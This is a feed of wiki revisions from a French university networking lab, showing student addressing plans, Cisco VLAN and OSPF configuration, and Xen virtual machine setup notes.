=Architecture réseau=&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56591</id>
		<title>TP sysres IMA5sc 2021/2022</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2021/2022&amp;diff=56591"/>
				<updated>2021-11-29T15:12:58Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G1 | Cahier n°1]]&lt;br /&gt;
| Andrei Florea / Julien Delabre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G2 | Cahier n°2]]&lt;br /&gt;
| Robin Lasserye / Aviran Tetia &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G3 | Cahier n°3]]&lt;br /&gt;
| Axel Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G4 | Cahier n°4]]&lt;br /&gt;
| Selim Raphael&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G5 | Cahier n°5]]&lt;br /&gt;
| Helene Camille&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G6 | Cahier n°6]]&lt;br /&gt;
| Boris JACQUOT / Louis WADBLED&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G7 | Cahier n°7]]&lt;br /&gt;
| Johnny Gouvaert / Arthur Vercaemst&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G8 | Cahier n°8]]&lt;br /&gt;
| Mel Theo&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G9 | Cahier n°9]]&lt;br /&gt;
| Khalil Alvare&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G10 | Cahier n°10]]&lt;br /&gt;
| Souleyman Enoch&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G11 | Cahier n°11]]&lt;br /&gt;
| Clément&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G12 | Cahier n°12]]&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA5 2021/2022 G13 | Cahier n°13]]&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B1::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B2::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B3::0/64 || 10.03.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B4::0/64 || 10.04.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || Duff&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B5::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B6::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B7::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || RinceCochon&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B8::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Souleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B9::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || Panache&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60BA::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || Corona&lt;br /&gt;
|-&lt;br /&gt;
| INTERCO || 531 || 192.168.222.72/29 ||  || || 192.168.222.73 || 192.168.222.74 || 192.168.222.75 ||  || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| XEN || 42 || 193.48.57.160/28 || 2001:7A8:116E:60BF::0/64 || 193.48.57.190/28 2001:7A8:116E:60B0::F3/64 || 193.48.57.187/28 2001:7A8:116E:60B0::F0/64|| 193.48.57.188/28 2001:7A8:116E:60B0::F1/64 || 192.48.57.189/28 2001:7A8:116E:60B0::F2/64|| || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Souleyman / Enoch || 193.48.57.185/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186/28 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!--&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
!--&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56590</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56590"/>
				<updated>2021-11-29T15:07:06Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* OPSF */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56589</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56589"/>
				<updated>2021-11-29T15:06:51Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* OPSF */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56278</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=56278"/>
				<updated>2021-10-25T15:54:48Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Création de notre VM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
==Configuration IPV4==&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage des VLANs ===&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==Création de notre VM==&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
